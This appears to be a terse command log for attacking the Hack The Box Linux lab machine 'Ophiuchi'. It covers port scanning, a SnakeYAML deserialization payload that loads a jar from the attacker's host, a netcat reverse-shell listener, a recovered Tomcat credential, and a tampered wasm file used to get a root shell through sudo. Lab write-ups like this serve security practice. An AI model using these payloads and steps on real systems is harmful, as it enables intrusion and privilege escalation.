Ophiuchi
HTB Linux
nmap -A -p- -oA ophiuchi 10.129.152.152 —min-rate=10000 —script=vuln —script-timeout=15 -v
nmap -sC -sV -O -p- -oA ophiuchi 10.129.152.152
nmap -sU -O -p- -oA ophiuchi-udp 10.129.152.152
nikto -h 10.129.152.152:80
whatweb http://10.129.152.152
git clone https://github.com/artsploit/yaml-payload
tree -fs
nmap -p8080 10.129.152.152 —script http-enum -oN webScan
http://10.129.152.152:8080/manager
cat src/artsploit/AwesomeScriptEngineFactory.java
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
python3 -m http.server 80
nc -lvnp 443
!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL [“http://10.10.14.20/yaml-payload.jar”] ]] ]
cat /opt/tomcat/conf/tomcat-users.xml
Credenciales-> admin:whythereisalimit
su admin
sudo -l
cd /tmp
ls -l /opt/wasm-functions
cat /opt/wasm-functions/index.go
cp /opt/wasm-functions/main.wasm .
touch deploy.sh
ls -l /bin/bash
vim deploy.sh
sudo /usr/bin/go run /opt/wasm-functions/index.go
git clone —recursive https://github.com/WebAssembly/wabt
cd wabt
git submodule update —init
mkdir build
cmake ..
cmake —build .
python3 -m http.server 8082
wget http://10.129.152.152:8082/main.wasm
./wasm2wat ../../main.wasm
./wasm2wat ../../main.wasm > main.wat
cat main.wat
rm main.wasm
./wat2wasm main.wat > main.wasm
python3 -m http.server 80
cd tmp
wget http://10.10.14.26/main.wasm
chmod +x main.wasm
ls -l /bin/bash
cat deploy.sh
ls -l /bin/bash
bash -p
